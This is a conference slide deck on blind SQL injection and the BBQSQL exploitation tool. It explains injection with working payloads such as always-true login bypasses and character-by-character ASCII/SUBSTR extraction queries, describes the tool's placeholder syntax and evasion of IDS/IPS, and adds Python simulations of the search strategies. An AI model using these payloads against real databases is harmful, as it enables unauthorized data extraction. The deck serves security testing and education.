Rapid Blind SQL Injection Exploitation with BBQSQL
BBQSQL
Ben Toews
Scott Behrens
Who are we?
● Ben Toews
○ Security Consultant / Researcher at Neohapsis
● Scott Behrens
○ Security Consultant / Researcher at Neohapsis
Why are we here?
● BBQSQL
○ New dog, old trick
■ Exploits Blind SQL Injection
○ New dog, new trick
■ Fast
■ Easy
■ Gets those hard to reach spots
SQL What?
● Structured Query Language (SQL)
○ Language for interacting with a database
● SQL Injection
○ Inject syntax into an application's SQL queries
Basic SQL Injection
Normal Case:

```
UNAME = "mastahyeti"
PASS  = "s3cret"
QUERY = "select * from users where pass=md5('"+PASS+"') and uname='"+UNAME+"'";
```

QUERY evaluates to:

```
select *
from users
where pass=md5('s3cret') and uname='mastahyeti'
```
Basic SQL Injection
SQL Injection Case:

```
UNAME = "pwned' or '1'='1";
PASS  = "pwned";
QUERY = "select * from users where pass=md5('"+PASS+"') and uname='"+UNAME+"'";
```

QUERY evaluates to:

```
select *
from users
where pass=md5('pwned') and uname='pwned' or '1'='1'
```
Blind SQL Injection
● Still trying to alter SQL syntax
● Dumping database
● More complex SQL syntax
Blind SQL Injection
Blind SQL Injection Case:

```
UNAME = "' or (ASCII(SUBSTR(SELECT user(),1,1))>63) --";
PASS  = "";
QUERY = "select * from users where pass=md5('"+PASS+"') and uname='"+UNAME+"'";
```

QUERY evaluates to:

```
select *
from users
where pass=md5('') and uname='' or (ASCII(SUBSTR(SELECT user(),1,1))>63) --'
```
Blind SQL Injection

```
select *
from users
where pass=md5('') and uname='' or (
  ASCII(                 << char -> int
    SUBSTR(              << slice string
      SELECT user()      << current user
      ,1,1)              << first char
  )>63                   << 63 = '?'
) --'                    << comment
```
Blind SQL Injection
● Binary (or other) search for each character
● One character at a time
● Time consuming
Blind SQL Injection
● Lots of excellent tools out there
○ sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ...
● Lots of great features (good job guys...)
● If these tools don't work
○ You end up writing a custom script, test, debug, test, debug...
● What if there was a way to simplify tricky Blind SQL Injection attacks...
BBQSQL: Use
doesn't care about your data!
doesn't care about your database!
Images from http://www.freedigitalphotos.net/
BBQSQL
● Exploits Blind SQL Injection
● For those hard to reach spots
● Semi-automatic
● Database agnostic
● Versatile
● Fast
● Fast
● Did we mention it is fast?
BBQSQL: Use
● Must provide the usual information
○ URL
○ HTTP Method
○ Headers
○ Cookies
○ Encoding methods
○ Redirect behavior
○ Files
○ HTTP Auth
○ Proxies
○ ...
BBQSQL: Use
● Provide two additional pieces of info
○ Specify where the injection goes
○ Specify what syntax we are injecting
BBQSQL: Use
● The injection can go ANYWHERE:
○ url => "http://google.com?vuln='${query}"
○ data => "user=foo&pass=${query}"
○ cookies => {'PHPSESSID':'123123','FOO':'BAR${query}'}
● Doesn't understand data; doesn't care about your annoying:
■ serialization format
■ processes and rules
■ encodings
BBQSQL: Use
● The query specifies how to do binary search:

```
query => "' and ASCII(SUBSTR((SELECT data FROM data LIMIT 1 OFFSET ${row_index:1}), ${char_index:1}, 1))${comparator:>}${char_val:0} #"
```

● Database agnostic
● Doesn't care about your annoying:
○ SQL syntax
○ Charset limitations
○ IDS/IPS
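The two slides above describe a placeholder syntax: `${query}` marks where the injection goes in the url/data/cookies, and `${name:default}` placeholders inside the query template are what the search loop fills in on each request. The example below is added here and is not BBQSQL's own code; it shows a plain-Python parser for that syntax (the regex, the `REQUIRED` set, the `example.invalid` host and the function names are assumptions), plus the check a tool like this needs before it sends anything: `${query}` appears in exactly one field and the template actually carries the placeholders the search can drive.

```python
import re

# Placeholder syntax used on the slides: ${name} or ${name:default}
PLACEHOLDER = re.compile(r"\$\{(?P<name>[A-Za-z_]\w*)(?::(?P<default>[^}]*))?\}")

# Query template copied from the slide above (injection syntax with per-placeholder defaults).
QUERY_TEMPLATE = (
    "' and ASCII(SUBSTR((SELECT data FROM data LIMIT 1 OFFSET ${row_index:1}), "
    "${char_index:1}, 1))${comparator:>}${char_val:0} #"
)

# Assumed: the search loop must be able to drive at least these three placeholders.
REQUIRED = {"char_index", "comparator", "char_val"}


def placeholders(template):
    """Map each ${...} name in the template to its default (None if it has none)."""
    return {m.group("name"): m.group("default") for m in PLACEHOLDER.finditer(template)}


def render(template, **values):
    """Fill placeholders from `values`, then from inline defaults; error if neither exists."""
    def fill(m):
        name, default = m.group("name"), m.group("default")
        if name in values:
            return str(values[name])
        if default is not None:
            return default
        raise KeyError("no value or default for ${%s}" % name)
    return PLACEHOLDER.sub(fill, template)


def injection_fields(request):
    """Names of the request fields (url, data, cookies, ...) that carry ${query}."""
    found = []
    for field, value in request.items():
        if isinstance(value, dict):          # cookies / headers are name -> value maps
            text = " ".join("%s=%s" % kv for kv in value.items())
        else:
            text = str(value)
        if "${query}" in text:
            found.append(field)
    return found


def validate(request, query_template):
    """Return a list of problems; an empty list means the request/query pair is usable."""
    problems = []
    fields = injection_fields(request)
    if len(fields) != 1:
        problems.append("${query} must appear in exactly one field, found in %r" % fields)
    missing = REQUIRED - set(placeholders(query_template))
    if missing:
        problems.append("query template lacks %s" % sorted(missing))
    return problems


def build_request(request, query_template, **search_values):
    """Render the query for one search step and splice it in wherever ${query} sits."""
    query = render(query_template, **search_values)
    return {
        field: ({k: v.replace("${query}", query) for k, v in value.items()}
                if isinstance(value, dict) else value.replace("${query}", query))
        for field, value in request.items()
    }


if __name__ == "__main__":
    # Constructed request shaped like the slide's url/data/cookies examples.
    req = {"url": "http://example.invalid/?vuln='${query}", "data": "user=foo&pass=bar",
           "cookies": {"PHPSESSID": "123123"}}
    print(validate(req, QUERY_TEMPLATE))
    print(build_request(req, QUERY_TEMPLATE, char_index=3, char_val=100)["url"])
```

Because `render` is the only place that knows the placeholder grammar, the rest of the tool never has to understand the request body's serialization or encoding, which is the "doesn't understand data" property the previous slide claims.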
BBQSQL: Speed
● Concurrent HTTP requests
● Multiple search algorithms
○ Binary search
○ Frequency based search
BBQSQL: grequests
grequests = gevent + requests
BBQSQL: gevent
"gevent is a coroutine-based Python networking library that uses greenlet to provide a high-level synchronous API on top of the libevent event loop" (http://gevent.org)
BBQSQL: gevent
● Coroutine ~ function
● You spawn many simultaneous coroutines
● Only one runs at a time
● When a coroutine encounters blocking (network IO) it yields and allows the next coroutine to run while it waits
● This forms an event loop
● Functionally, it appears to act like threading
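To make the bullets above concrete, here is a toy version of that model, added for this page and not gevent's or BBQSQL's code: plain generators stand in for greenlets, a `deque` stands in for the libevent loop, and each `yield` is the point where a real coroutine would be waiting on a socket. The job names, round counts and the `fetch`/`run` names are constructed.

```python
from collections import deque


def fetch(name, rounds, log):
    """A simulated HTTP request: each `yield` stands for 'waiting on network IO'.
    Instead of blocking the thread, the coroutine hands control back to the loop."""
    for i in range(rounds):
        log.append("%s: waiting on IO (%d/%d)" % (name, i + 1, rounds))
        yield
    log.append("%s: done" % name)
    return name + "-response"


def run(jobs):
    """Toy event loop: spawn one coroutine per (name, rounds) job and resume them
    round-robin until all finish. Only one coroutine ever runs at a time; the
    interleaving recorded in `log` is what makes it look like threading.
    Returns (log, results, number of resumptions)."""
    log, results = [], {}
    ready = deque((name, fetch(name, rounds, log)) for name, rounds in jobs)
    turns = 0
    while ready:
        name, gen = ready.popleft()
        turns += 1
        try:
            next(gen)                   # run until the coroutine 'blocks' (yields)
            ready.append((name, gen))   # still waiting: back of the queue
        except StopIteration as finished:
            results[name] = finished.value
    return log, results, turns


if __name__ == "__main__":
    log, results, turns = run([("req-a", 2), ("req-b", 1)])
    print("\n".join(log))
    print(results, "in", turns, "turns")
```

With two jobs that "wait" two and one rounds respectively, the log shows `req-a`, then `req-b`, then `req-a` again before either finishes: the second request makes progress during the first one's wait, which is where the concurrency on the Speed slide comes from, with a single thread and no locks.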
BBQSQL: requests
"HTTP For Humans" (docs.python-requests.org)
● Awesome HTTP API built on top of urllib3 in Python
● Written/maintained by Kenneth Reitz
○ API designing badass
BBQSQL: grequests
Good Evented HTTP for Python
BBQSQL: Binary Search
(slide diagram: the candidate range is halved at each step until one value remains)

```
1 2 3 4 5 6 7 8 9 10 11 12
            7 8 9 10 11 12
            7 8 9 10
            7 8 9 10
              8
```

Average Case: O(log(n))
BBQSQL: Linear Search
(slide diagram: the candidates are tried one after another, left to right)

```
1 2 3 4 5 6 7 8 9 10 11 12
...
```

Average Case: O(n/2)
BBQSQL: Frequency
● Analysed lots of books, source code, CCs, SSNs :P
● Most common characters are [' ', 'e', 't', 'o', 'a']
● Most likely characters to follow 'e' are [' ', 'r', 'n']
BBQSQL: Frequency
● Very fast against non-entropic data:
○ English
■ ~10 requests/character
○ Python
■ ~8 requests/character
○ Credit card numbers
■ ~5.5 requests/character
● vs. binary search
○ English
■ ~12 requests/character
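The Binary Search, Linear Search and Frequency slides above all come down to one question: how many yes/no answers does each strategy need per character? The simulation below is added for this page and is not BBQSQL's code. A local `Oracle` replaces the server and answers one comparison per call, so the counter it keeps is the number of near-identical boolean requests the real technique would send, which is the signal a rate-based detection or request-pattern rule is looking at. The secret, the tiny `CORPUS` standing in for the authors' books, the `TOP` guess count and the fallback-to-binary design are all assumptions of this example.

```python
from collections import Counter, defaultdict
from operator import eq, gt

SECRET = "the data is here"   # constructed value the oracle protects
LO, HI = 0, 127               # ASCII range searched; 0 doubles as end-of-string
TOP = 3                       # frequency guesses to try before falling back

# Constructed stand-in for the books/source/card data the authors analysed.
CORPUS = ("the tree is near the store and the data is there "
          "when the tea is hot we rest here")


class Oracle:
    """Stands in for the server: answers one boolean comparison per call, the way
    one injected `ASCII(SUBSTR(value, idx, 1)) <comparator> <char_val>` would.
    `queries` counts how many requests the real attack would have sent."""

    def __init__(self, secret):
        self.secret, self.queries = secret, 0

    def ask(self, idx, op, val):
        self.queries += 1
        code = ord(self.secret[idx]) if idx < len(self.secret) else 0
        return op(code, val)


def binary_char(oracle, idx, prev=None):
    """Binary strategy: halve the candidate range with `>` probes (7 per char here)."""
    lo, hi = LO, HI
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(idx, gt, mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def build_model(text, top=TOP):
    """Unigram order for the first char, bigram order for what follows each char."""
    first = [c for c, _ in Counter(text).most_common(top)]
    bigrams = defaultdict(Counter)
    for a, b in zip(text, text[1:]):
        bigrams[a][b] += 1
    follow = {a: [c for c, _ in cnt.most_common(top)] for a, cnt in bigrams.items()}
    return first, follow


FIRST, FOLLOW = build_model(CORPUS)


def frequency_char(oracle, idx, prev=None):
    """Frequency strategy: try the likeliest characters with `=` probes, then
    fall back to binary search if none of them match."""
    guesses = FIRST if prev is None else FOLLOW.get(prev, FIRST)
    for g in guesses:
        if oracle.ask(idx, eq, ord(g)):
            return ord(g)
    return binary_char(oracle, idx)


def extract(oracle, char_fn):
    """Recover characters left to right until the terminator (code 0) is found."""
    out, prev = [], None
    while True:
        code = char_fn(oracle, len(out), prev)
        if code == 0:
            return "".join(out)
        prev = chr(code)
        out.append(prev)


def compare(secret=SECRET):
    """Run both strategies against a fresh oracle; return {name: (recovered, queries)}."""
    results = {}
    for name, fn in (("binary", binary_char), ("frequency", frequency_char)):
        oracle = Oracle(secret)
        results[name] = (extract(oracle, fn), oracle.queries)
    return results


if __name__ == "__main__":
    for name, (value, n) in compare().items():
        print("%-9s %3d queries -> %r" % (name, n, value))
```

Binary search costs exactly seven probes for every position over a 128-value range, terminator included, so a 16-character string is 119 requests regardless of content. The frequency strategy pays one to three probes when a guess hits and ten when it misses, so it only wins on text that resembles its model, which is the "non-entropic data" caveat on the slide; on random data it is strictly worse than binary search.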
BBQSQL: UI
● UI is built using source from the Social Engineering Toolkit (SET)
○ Thanks Dave (ReL1K) Kennedy!
● Input validation is performed on each configuration option in real time to prevent snafu
○ You don't have to wait till you type up a huge request on the CLI and find out your 600 char POST data is malformed!
BBQSQL: UI
● Configuration files can be imported and exported through UI or CLI
○ Uses ConfigParser, so easy to work with
● Can export attack results as a CSV file
Credits
● Wikipedia (math is hard)
● Neohapsis Labs
● Image links are embedded in presentation
● ReL1K - SET https://www.trustedsec.com/downloads/social-engineer-toolkit/
Thanks
Ben Toews - @mastahyeti
Scott Behrens - @helloarbit
Neohapsis(.com) << Hiring << bonus4us
BBQSQL github.com/neohapsis/bbqsql